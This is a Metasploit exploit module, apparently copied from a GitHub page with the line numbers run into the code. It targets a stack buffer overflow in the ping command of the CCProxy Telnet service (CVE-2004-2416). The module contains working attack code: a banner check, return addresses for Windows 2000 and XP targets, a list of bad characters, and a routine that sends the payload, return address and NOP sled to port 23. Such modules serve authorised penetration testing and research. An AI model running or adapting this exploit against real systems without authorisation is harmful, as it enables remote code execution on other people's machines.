Path: blob/master/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
19513 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'CCProxy Telnet Proxy Ping Overflow',15'Description' => %q{16This module exploits the YoungZSoft CCProxy <= v6.2 suite17Telnet service. The stack is overwritten when sending an overly18long address to the 'ping' command.19},20'Author' => [ 'aushack' ],21'Arch' => [ ARCH_X86 ],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2004-2416' ],25[ 'OSVDB', '11593' ],26[ 'BID', '11666' ],27[ 'EDB', '621' ],28],29'Privileged' => false,30'DefaultOptions' => {31'EXITFUNC' => 'thread',32},33'Payload' => {34'Space' => 1012,35'BadChars' => "\x00\x07\x08\x0a\x0d\x20",36},37'Platform' => ['win'],38'Targets' => [39# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.40[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll41[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll42[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll43[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll44[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll45],46'DisclosureDate' => '2004-11-11',47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)5455register_options(56[57Opt::RPORT(23),58]59)60end6162def check63connect64banner = sock.get_once || ''65disconnect6667if banner.to_s =~ /CCProxy Telnet Service Ready/68return Exploit::CheckCode::Detected69end7071return Exploit::CheckCode::Safe72end7374def exploit75connect7677sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)78sock.put(sploit + "\r\n")7980handler81disconnect82end83end848586